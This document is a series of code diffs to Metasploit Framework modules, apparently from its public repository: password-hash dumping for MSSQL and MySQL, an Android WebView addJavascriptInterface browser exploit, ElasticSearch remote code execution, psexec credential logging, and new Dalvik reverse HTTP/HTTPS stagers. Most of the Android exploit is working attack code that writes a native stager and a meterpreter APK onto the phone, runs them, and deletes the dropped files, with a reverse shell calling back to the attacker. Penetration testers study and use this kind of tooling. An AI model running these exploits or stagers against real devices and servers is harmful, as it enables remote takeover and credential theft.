@ -55,10 +55,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
case version_year
|
case version_year
|
||||||
when "2000"
|
when "2000"
|
||||||
hashtype = "mssql.hashes"
|
hashtype = "mssql"
|
||||||
|
|
||||||
when "2005", "2008"
|
when "2005", "2008", "2012", "2014"
|
||||||
hashtype = "mssql05.hashes"
|
hashtype = "mssql05"
|
||||||
end
|
end
|
||||||
|
|
||||||
this_service = report_service(
|
this_service = report_service(
|
||||||
|
@ -74,15 +74,42 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'Columns' => ['Username', 'Hash']
|
'Columns' => ['Username', 'Hash']
|
||||||
)
|
)
|
||||||
|
|
||||||
hash_loot=""
|
service_data = {
|
||||||
|
address: ::Rex::Socket.getaddress(rhost,true),
|
||||||
|
port: rport,
|
||||||
|
service_name: 'mssql',
|
||||||
|
protocol: 'tcp',
|
||||||
|
workspace_id: myworkspace_id
|
||||||
|
}
|
||||||
|
|
||||||
mssql_hashes.each do |row|
|
mssql_hashes.each do |row|
|
||||||
next if row[0].nil? or row[1].nil?
|
next if row[0].nil? or row[1].nil?
|
||||||
next if row[0].empty? or row[1].empty?
|
next if row[0].empty? or row[1].empty?
|
||||||
|
|
||||||
|
credential_data = {
|
||||||
|
module_fullname: self.fullname,
|
||||||
|
origin_type: :service,
|
||||||
|
private_type: :nonreplayable_hash,
|
||||||
|
private_data: row[1],
|
||||||
|
username: row[0],
|
||||||
|
jtr_format: hashtype
|
||||||
|
}
|
||||||
|
|
||||||
|
credential_data.merge!(service_data)
|
||||||
|
|
||||||
|
credential_core = create_credential(credential_data)
|
||||||
|
|
||||||
|
login_data = {
|
||||||
|
core: credential_core,
|
||||||
|
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||||
|
}
|
||||||
|
|
||||||
|
login_data.merge!(service_data)
|
||||||
|
login = create_credential_login(login_data)
|
||||||
|
|
||||||
tbl << [row[0], row[1]]
|
tbl << [row[0], row[1]]
|
||||||
print_good("#{rhost}:#{rport} - Saving #{hashtype} = #{row[0]}:#{row[1]}")
|
print_good("#{rhost}:#{rport} - Saving #{hashtype} = #{row[0]}:#{row[1]}")
|
||||||
end
|
end
|
||||||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlhashes.txt"
|
|
||||||
store_loot(hashtype, "text/plain", datastore['RHOST'], tbl.to_csv, filename, "MS SQL Hashes", this_service)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
#Grabs the user tables depending on what Version of MSSQL
|
#Grabs the user tables depending on what Version of MSSQL
|
||||||
|
@ -99,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
when "2000"
|
when "2000"
|
||||||
results = mssql_query(mssql_2k_password_hashes())[:rows]
|
results = mssql_query(mssql_2k_password_hashes())[:rows]
|
||||||
|
|
||||||
when "2005", "2008"
|
when "2005", "2008", "2012", "2014"
|
||||||
results = mssql_query(mssql_2k5_password_hashes())[:rows]
|
results = mssql_query(mssql_2k5_password_hashes())[:rows]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -37,41 +37,41 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
this_service = report_service(
|
service_data = {
|
||||||
:host => datastore['RHOST'],
|
address: ::Rex::Socket.getaddress(rhost,true),
|
||||||
:port => datastore['RPORT'],
|
port: rport,
|
||||||
:name => 'mysql',
|
service_name: 'mysql',
|
||||||
:proto => 'tcp'
|
protocol: 'tcp',
|
||||||
)
|
workspace_id: myworkspace_id
|
||||||
|
}
|
||||||
|
|
||||||
|
credential_data = {
|
||||||
|
origin_type: :service,
|
||||||
|
jtr_format: 'mysql,mysql-sha1',
|
||||||
|
module_fullname: self.fullname,
|
||||||
|
private_type: :nonreplayable_hash
|
||||||
|
}
|
||||||
|
|
||||||
#create a table to store data
|
credential_data.merge!(service_data)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
|
||||||
'Header' => 'MysQL Server Hashes',
|
|
||||||
'Indent' => 1,
|
|
||||||
'Columns' => ['Username', 'Hash']
|
|
||||||
)
|
|
||||||
|
|
||||||
if res.size > 0
|
if res.size > 0
|
||||||
res.each do |row|
|
res.each do |row|
|
||||||
tbl << [row[0], row[1]]
|
credential_data[:username] = row[0]
|
||||||
|
credential_data[:private_data] = row[1]
|
||||||
print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
|
print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
|
||||||
|
credential_core = create_credential(credential_data)
|
||||||
|
login_data = {
|
||||||
|
core: credential_core,
|
||||||
|
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||||
|
}
|
||||||
|
login_data.merge!(service_data)
|
||||||
|
create_credential_login(login_data)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?
|
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
#Stores the Hash Table as Loot for Later Cracking
|
|
||||||
def report_hashes(hash_loot,service)
|
|
||||||
|
|
||||||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_mysqlhashes.txt"
|
|
||||||
path = store_loot("mysql.hashes", "text/plain", datastore['RHOST'], hash_loot, filename, "MySQL Hashes",service)
|
|
||||||
print_status("Hash Table has been saved: #{path}")
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -10,9 +10,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::Remote::BrowserExploitServer
|
include Msf::Exploit::Remote::BrowserExploitServer
|
||||||
include Msf::Exploit::Remote::BrowserAutopwn
|
include Msf::Exploit::Remote::BrowserAutopwn
|
||||||
|
|
||||||
autopwn_info({
|
# Since the NDK stager is used, arch detection must be performed
|
||||||
:os_flavor => "Android",
|
SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]
|
||||||
:arch => ARCH_ARMLE,
|
|
||||||
|
# Most android devices are ARM
|
||||||
|
DEFAULT_ARCH = ARCH_ARMLE
|
||||||
|
|
||||||
|
# Some of the default NDK build targets are named differently than
|
||||||
|
# msf's builtin constants. This mapping allows the ndkstager file
|
||||||
|
# to be looked up from the msf constant.
|
||||||
|
NDK_FILES = {
|
||||||
|
ARCH_ARMLE => 'armeabi',
|
||||||
|
ARCH_MIPSLE => 'mips'
|
||||||
|
}
|
||||||
|
|
||||||
|
autopwn_info(
|
||||||
|
:os_flavor => 'Android',
|
||||||
:javascript => true,
|
:javascript => true,
|
||||||
:rank => ExcellentRanking,
|
:rank => ExcellentRanking,
|
||||||
:vuln_test => %Q|
|
:vuln_test => %Q|
|
||||||
|
@ -23,12 +36,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
} catch(e) {}
|
} catch(e) {}
|
||||||
}
|
}
|
||||||
|
|
|
|
||||||
})
|
)
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',
|
'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a privilege escalation issue in Android < 4.2's WebView component
|
This module exploits a privilege escalation issue in Android < 4.2's WebView component
|
||||||
that arises when untrusted Javascript code is executed by a WebView that has one or more
|
that arises when untrusted Javascript code is executed by a WebView that has one or more
|
||||||
Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
|
Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
|
||||||
|
@ -46,75 +59,185 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
Note: Adding a .js to the URL will return plain javascript (no HTML markup).
|
Note: Adding a .js to the URL will return plain javascript (no HTML markup).
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'jduck', # original msf module
|
'jduck', # original msf module
|
||||||
'joev' # static server
|
'joev' # static server
|
||||||
],
|
],
|
||||||
'References' => [
|
'References' => [
|
||||||
['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
|
['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
|
||||||
['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
|
['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
|
||||||
['URL', 'http://50.56.33.56/blog/?p=314'],
|
['URL', 'http://50.56.33.56/blog/?p=314'],
|
||||||
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
|
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
|
||||||
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
|
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
|
||||||
|
['CVE', '2012-6636'], # original CVE for addJavascriptInterface
|
||||||
|
['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
|
||||||
|
['EDB', '31519'],
|
||||||
|
['OSVDB', '97520']
|
||||||
],
|
],
|
||||||
'Platform' => 'linux',
|
'Platform' => 'android',
|
||||||
'Arch' => ARCH_ARMLE,
|
'Arch' => ARCH_DALVIK,
|
||||||
'DefaultOptions' => { 'PrependFork' => true },
|
'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
|
||||||
'Targets' => [ [ 'Automatic', {} ] ],
|
'Targets' => [ [ 'Automatic', {} ] ],
|
||||||
'DisclosureDate' => 'Dec 21 2012',
|
'DisclosureDate' => 'Dec 21 2012',
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'BrowserRequirements' => {
|
'BrowserRequirements' => {
|
||||||
:source => 'script',
|
:source => 'script',
|
||||||
:os_flavor => "Android",
|
:os_flavor => 'Android'
|
||||||
:arch => ARCH_ARMLE
|
|
||||||
}
|
}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Hooked to prevent BrowserExploitServer from attempting to do JS detection
|
||||||
|
# on requests for the static javascript file
|
||||||
def on_request_uri(cli, req)
|
def on_request_uri(cli, req)
|
||||||
if req.uri.end_with?('js')
|
if req.uri =~ /\.js/
|
||||||
print_status("Serving javascript")
|
serve_static_js(cli, req)
|
||||||
send_response(cli, js, 'Content-type' => 'text/javascript')
|
|
||||||
else
|
else
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# The browser appears to be vulnerable, serve the exploit
|
||||||
def on_request_exploit(cli, req, browser)
|
def on_request_exploit(cli, req, browser)
|
||||||
print_status("Serving exploit HTML")
|
arch = normalize_arch(browser[:arch])
|
||||||
send_response_html(cli, html)
|
print_status "Serving #{arch} exploit..."
|
||||||
|
send_response_html(cli, html(arch))
|
||||||
end
|
end
|
||||||
|
|
||||||
def js
|
# The NDK stager is used to launch a hidden APK
|
||||||
%Q|
|
def ndkstager(stagename, arch)
|
||||||
function exec(obj) {
|
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
|
||||||
|
data = File.read(localfile, :mode => 'rb')
|
||||||
|
data.gsub!('PLOAD', stagename)
|
||||||
|
end
|
||||||
|
|
||||||
|
def js(arch)
|
||||||
|
stagename = Rex::Text.rand_text_alpha(5)
|
||||||
|
script = %Q|
|
||||||
|
function exec(runtime, cmdArr) {
|
||||||
|
var ch = 0;
|
||||||
|
var output = '';
|
||||||
|
var process = runtime.exec(cmdArr);
|
||||||
|
var input = process.getInputStream();
|
||||||
|
|
||||||
|
while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); }
|
||||||
|
return output;
|
||||||
|
}
|
||||||
|
|
||||||
|
function attemptExploit(obj) {
|
||||||
// ensure that the object contains a native interface
|
// ensure that the object contains a native interface
|
||||||
try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
|
try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
|
||||||
|
|
||||||
|
// get the pid
|
||||||
|
var pid = obj.getClass()
|
||||||
|
.forName('android.os.Process')
|
||||||
|
.getMethod('myPid', null)
|
||||||
|
.invoke(null, null);
|
||||||
|
|
||||||
// get the runtime so we can exec
|
// get the runtime so we can exec
|
||||||
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
|
var runtime = obj.getClass()
|
||||||
var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
|
.forName('java.lang.Runtime')
|
||||||
|
.getMethod('getRuntime', null)
|
||||||
|
.invoke(null, null);
|
||||||
|
|
||||||
|
// libraryData contains the bytes for a native shared object built via NDK
|
||||||
|
// which will load the "stage", which in this case is our android meterpreter stager.
|
||||||
|
// LibraryData is loaded via ajax later, because we have to access javascript in
|
||||||
|
// order to detect what arch we are running.
|
||||||
|
var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
|
||||||
|
|
||||||
|
// the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
|
||||||
|
// another stager which loads android meterpreter from the msf handler.
|
||||||
|
var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
|
||||||
|
|
||||||
// get the process name, which will give us our data path
|
// get the process name, which will give us our data path
|
||||||
var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
|
// $PPID does not seem to work on android 4.0, so we concat pids manually
|
||||||
var ch, path = '/data/data/';
|
var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
|
||||||
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
|
|
||||||
path += '/#{Rex::Text.rand_text_alpha(8)}';
|
|
||||||
|
|
||||||
// build the binary, chmod it, and execute it
|
var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
|
||||||
m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
|
var stagePath = path + '/#{stagename}.apk';
|
||||||
m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
|
|
||||||
m.invoke(null, null).exec([path]);
|
// build the library and chmod it
|
||||||
|
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
|
||||||
|
runtime.exec(['chmod', '700', libraryPath]).waitFor();
|
||||||
|
|
||||||
|
// build the stage, chmod it, and load it
|
||||||
|
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
|
||||||
|
runtime.exec(['chmod', '700', stagePath]).waitFor();
|
||||||
|
|
||||||
|
// load the library (this fails in x86, figure out why)
|
||||||
|
runtime.load(libraryPath);
|
||||||
|
|
||||||
|
// delete dropped files
|
||||||
|
runtime.exec(['rm', stagePath]).waitFor();
|
||||||
|
runtime.exec(['rm', libraryPath]).waitFor();
|
||||||
|
|
||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
|
|
||||||
for (i in top) { if (exec(top[i]) === true) break; }
|
for (i in top) { if (attemptExploit(top[i]) === true) break; }
|
||||||
|
|
|
||||||
|
|
||||||
|
# remove comments and empty lines
|
||||||
|
script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
|
||||||
|
end
|
||||||
|
|
||||||
|
# Called when a client requests a .js route.
|
||||||
|
# This is handy for post-XSS.
|
||||||
|
def serve_static_js(cli, req)
|
||||||
|
arch = req.qstring['arch']
|
||||||
|
response_opts = { 'Content-type' => 'text/javascript' }
|
||||||
|
|
||||||
|
if arch.present?
|
||||||
|
print_status("Serving javascript for arch #{normalize_arch arch}")
|
||||||
|
send_response(cli, js(normalize_arch arch), response_opts)
|
||||||
|
else
|
||||||
|
print_status("Serving arch detection javascript")
|
||||||
|
send_response(cli, static_arch_detect_js, response_opts)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# This is served to requests for the static .js file.
|
||||||
|
# Because we have to use javascript to detect arch, we have 3 different
|
||||||
|
# versions of the static .js file (x86/mips/arm) to choose from. This
|
||||||
|
# small snippet of js detects the arch and requests the correct file.
|
||||||
|
def static_arch_detect_js
|
||||||
|
%Q|
|
||||||
|
var arches = {};
|
||||||
|
arches['#{ARCH_ARMLE}'] = /arm/i;
|
||||||
|
arches['#{ARCH_MIPSLE}'] = /mips/i;
|
||||||
|
arches['#{ARCH_X86}'] = /x86/i;
|
||||||
|
|
||||||
|
var arch = null;
|
||||||
|
for (var name in arches) {
|
||||||
|
if (navigator.platform.toString().match(arches[name])) {
|
||||||
|
arch = name;
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (arch) {
|
||||||
|
// load the script with the correct arch
|
||||||
|
var script = document.createElement('script');
|
||||||
|
script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
|
||||||
|
script.setAttribute('type', 'text/javascript');
|
||||||
|
|
||||||
|
// ensure body is parsed and we won't be in an uninitialized state
|
||||||
|
setTimeout(function(){
|
||||||
|
var node = document.body \|\| document.head;
|
||||||
|
node.appendChild(script);
|
||||||
|
}, 100);
|
||||||
|
}
|
||||||
|
|
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def html
|
# @return [String] normalized client architecture
|
||||||
"<!doctype html><html><body><script>#{js}</script></body></html>"
|
def normalize_arch(arch)
|
||||||
|
if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
|
||||||
|
end
|
||||||
|
|
||||||
|
def html(arch)
|
||||||
|
"<!doctype html><html><body><script>#{js(arch)}</script></body></html>"
|
||||||
end
|
end
|
||||||
end
|
end
|
|
@ -15,10 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
|
'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a remote command execution vulnerability in ElasticSearch,
|
This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
|
||||||
exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
|
exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
|
||||||
REST API, which requires no authentication or authorization, where the search
|
REST API, which does not require authentication, where the search
|
||||||
function allows dynamic scripts execution, and can be used for remote attackers
|
function allows dynamic scripts execution. It can be used for remote attackers
|
||||||
to execute arbitrary Java code. This module has been tested successfully on
|
to execute arbitrary Java code. This module has been tested successfully on
|
||||||
ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
|
ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
|
||||||
},
|
},
|
||||||
|
@ -65,29 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
print_status("#{peer} - Trying to execute arbitrary Java..")
|
print_status("#{peer} - Trying to execute arbitrary Java...")
|
||||||
unless vulnerable?
|
unless vulnerable?
|
||||||
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
|
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("#{peer} - Asking remote OS...")
|
print_status("#{peer} - Discovering remote OS...")
|
||||||
res = execute(java_os)
|
res = execute(java_os)
|
||||||
result = parse_result(res)
|
result = parse_result(res)
|
||||||
if result.nil?
|
if result.nil?
|
||||||
fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...")
|
fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
|
||||||
else
|
else
|
||||||
print_good("#{peer} - OS #{result} found")
|
# TODO: It'd be nice to report_host() with this info.
|
||||||
|
print_good("#{peer} - Remote OS is '#{result}'")
|
||||||
end
|
end
|
||||||
|
|
||||||
jar_file = ""
|
jar_file = ""
|
||||||
if result =~ /win/i
|
if result =~ /win/i
|
||||||
print_status("#{peer} - Asking TEMP path")
|
print_status("#{peer} - Discovering TEMP path")
|
||||||
res = execute(java_tmp_dir)
|
res = execute(java_tmp_dir)
|
||||||
result = parse_result(res)
|
result = parse_result(res)
|
||||||
if result.nil?
|
if result.nil?
|
||||||
fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...")
|
fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
|
||||||
else
|
else
|
||||||
print_good("#{peer} - TEMP path found on #{result}")
|
print_good("#{peer} - TEMP path identified: '#{result}'")
|
||||||
end
|
end
|
||||||
jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
|
jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
|
||||||
else
|
else
|
||||||
|
|
|
@ -107,20 +107,48 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
if datastore['DB_REPORT_AUTH'] and datastore['SMBUser'].to_s.strip.length > 0
|
if datastore['DB_REPORT_AUTH'] and datastore['SMBUser'].to_s.strip.length > 0
|
||||||
report_hash = {
|
|
||||||
:host => datastore['RHOST'],
|
service_data = {
|
||||||
:port => datastore['RPORT'],
|
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
|
||||||
:sname => 'smb',
|
port: datastore['RPORT'],
|
||||||
:user => datastore['SMBUser'].downcase,
|
service_name: 'smb',
|
||||||
:pass => datastore['SMBPass'],
|
protocol: 'tcp',
|
||||||
:active => true
|
workspace_id: myworkspace_id
|
||||||
}
|
}
|
||||||
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
|
|
||||||
report_hash.merge!({:type => 'smb_hash'})
|
credential_data = {
|
||||||
else
|
origin_type: :service,
|
||||||
report_hash.merge!({:type => 'password'})
|
module_fullname: self.fullname,
|
||||||
|
private_data: datastore['SMBPass'],
|
||||||
|
username: datastore['SMBUser'].downcase
|
||||||
|
}
|
||||||
|
|
||||||
|
if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
|
||||||
|
credential_data.merge!({
|
||||||
|
realm_key: Metasploit::Credential::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
|
||||||
|
realm_value: datastore['SMBDomain']
|
||||||
|
})
|
||||||
end
|
end
|
||||||
report_auth_info(report_hash)
|
|
||||||
|
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
|
||||||
|
credential_data.merge!({:private_type => :ntlm_hash})
|
||||||
|
else
|
||||||
|
credential_data.merge!({:private_type => :password})
|
||||||
|
end
|
||||||
|
|
||||||
|
credential_data.merge!(service_data)
|
||||||
|
|
||||||
|
credential_core = create_credential(credential_data)
|
||||||
|
|
||||||
|
login_data = {
|
||||||
|
access_level: 'Admin',
|
||||||
|
core: credential_core,
|
||||||
|
last_attempted_at: DateTime.now,
|
||||||
|
status: Metasploit::Credential::Login::Status::SUCCESSFUL
|
||||||
|
}
|
||||||
|
|
||||||
|
login_data.merge!(service_data)
|
||||||
|
login = create_credential_login(login_data)
|
||||||
end
|
end
|
||||||
|
|
||||||
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
||||||
|
|
|
@ -0,0 +1,58 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/handler/reverse_http'
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Payload::Stager
|
||||||
|
include Msf::Payload::Dalvik
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Dalvik Reverse HTTP Stager',
|
||||||
|
'Description' => 'Tunnel communication over HTTP',
|
||||||
|
'Author' => 'anwarelmakrahy',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'android',
|
||||||
|
'Arch' => ARCH_DALVIK,
|
||||||
|
'Handler' => Msf::Handler::ReverseHttp,
|
||||||
|
'Stager' => {'Payload' => ""}
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_jar(opts={})
|
||||||
|
host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
|
||||||
|
port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
|
||||||
|
raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
|
||||||
|
|
||||||
|
jar = Rex::Zip::Jar.new
|
||||||
|
|
||||||
|
classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
|
||||||
|
string_sub(classes, 'ZZZZ ', "ZZZZhttp://" + host + ":" + port)
|
||||||
|
string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
|
||||||
|
jar.add_file("classes.dex", fix_dex_header(classes))
|
||||||
|
|
||||||
|
files = [
|
||||||
|
[ "AndroidManifest.xml" ],
|
||||||
|
[ "resources.arsc" ]
|
||||||
|
]
|
||||||
|
|
||||||
|
jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
|
||||||
|
jar.build_manifest
|
||||||
|
|
||||||
|
cert, key = generate_cert
|
||||||
|
jar.sign(key, cert, [cert])
|
||||||
|
|
||||||
|
jar
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -0,0 +1,57 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/handler/reverse_https'
|
||||||
|
|
||||||
|
module Metasploit3
|
||||||
|
|
||||||
|
include Msf::Payload::Stager
|
||||||
|
include Msf::Payload::Dalvik
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(merge_info(info,
|
||||||
|
'Name' => 'Dalvik Reverse HTTPS Stager',
|
||||||
|
'Description' => 'Tunnel communication over HTTPS',
|
||||||
|
'Author' => 'anwarelmakrahy',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'android',
|
||||||
|
'Arch' => ARCH_DALVIK,
|
||||||
|
'Handler' => Msf::Handler::ReverseHttps,
|
||||||
|
'Stager' => {'Payload' => ""}
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_jar(opts={})
|
||||||
|
host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
|
||||||
|
port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
|
||||||
|
raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
|
||||||
|
|
||||||
|
jar = Rex::Zip::Jar.new
|
||||||
|
|
||||||
|
classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
|
||||||
|
string_sub(classes, 'ZZZZ ', "ZZZZhttps://" + host + ":" + port)
|
||||||
|
string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
|
||||||
|
jar.add_file("classes.dex", fix_dex_header(classes))
|
||||||
|
|
||||||
|
files = [
|
||||||
|
[ "AndroidManifest.xml" ],
|
||||||
|
[ "resources.arsc" ]
|
||||||
|
]
|
||||||
|
|
||||||
|
jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
|
||||||
|
jar.build_manifest
|
||||||
|
|
||||||
|
cert, key = generate_cert
|
||||||
|
jar.sign(key, cert, [cert])
|
||||||
|
|
||||||
|
jar
|
||||||
|
end
|
||||||
|
end
|
|
@ -24,10 +24,11 @@ module Metasploit3
|
||||||
'Handler' => Msf::Handler::ReverseTcp,
|
'Handler' => Msf::Handler::ReverseTcp,
|
||||||
'Stager' => {'Payload' => ""}
|
'Stager' => {'Payload' => ""}
|
||||||
))
|
))
|
||||||
end
|
|
||||||
|
|
||||||
def string_sub(data, placeholder, input)
|
register_options(
|
||||||
data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
|
[
|
||||||
|
OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
|
||||||
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def generate_jar(opts={})
|
def generate_jar(opts={})
|
||||||
|
@ -35,46 +36,20 @@ module Metasploit3
|
||||||
|
|
||||||
